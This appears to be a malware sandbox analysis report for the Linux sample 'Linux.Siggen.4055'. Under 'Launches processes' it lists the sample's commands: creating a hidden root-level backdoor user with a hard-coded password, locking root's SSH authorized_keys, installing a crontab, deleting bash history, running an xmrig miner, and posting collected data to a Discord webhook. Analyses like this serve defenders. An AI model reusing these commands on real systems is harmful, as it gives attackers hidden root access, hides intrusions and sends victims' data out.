Linux.Siggen.4055

To ensure autorun and distribution:

Creates or modifies the following files:

Malicious functions:

Gets access to SSH keys

Manages services:

Launches processes:

/bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
<SAMPLE_FULL_PATH>
/bin/bash <SAMPLE_FULL_PATH> -c
/usr/bin/curl -s -connect-timeout 4 -m 4 ifconfig.me
rm -rf *timeout
whoami
date +%m/%d/%Y
mkdir /var/tmp/.ladyg0g0/
id -u
sleep 0.5
cat /var/tmp/.ladyg0g0/.pr1nc35
chmod 777 xmrig
grep -q cacar
cat /etc/passwd
/usr/sbin/useradd -u0 -g0 -o -s /bin/bash cacar
nscd -i passwd
nscd -i group
usermod -aG sudo cacar
yes Cacar12mocangeala
passwd cacar
mkdir /usr/.SQL-Unix
mkdir /usr/.SQL-Unix/.SQL
uname -a
chattr -i /root/.ssh
chattr -i /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
chattr +i /root/.ssh/authorized_keys
/usr/bin/curl -H Content-Type: application/json --data @/tmp/.send.json https://discord.com/api/webhooks/840910860561285160/iQ3JiaVqXM-mPe8n29NCHt5dAAYhbAxMrQQ8hnS4YeNSGCQn3xsDdtfcfHCV4mrPqX3J
grep -q .black
crontab -l
rm -rf /root/.5p4rk3l5
sleep 1
crontab /root/.5p4rk3l5
rm -rf /root/.bashrc
rm -rf /root/.bash_history
chmod 777 /root/.b4nd1d0
/root/./.b4nd1d0
pgrep -x xmrig
/root/./xmrig
bash -c yum install -y rsync >/dev/null 2>&1 & disown
cp -avr /root /usr/bin/.locatione
chmod 777 /usr/bin/sshd
chmod 644 /lib/systemd/system/myservice.service

Performs operations with the file system:

Modifies file access rights:

Creates folders:

Creates symlinks:

Creates or modifies files:

Deletes files:

Other:

Collects CPU information

Collects RAM information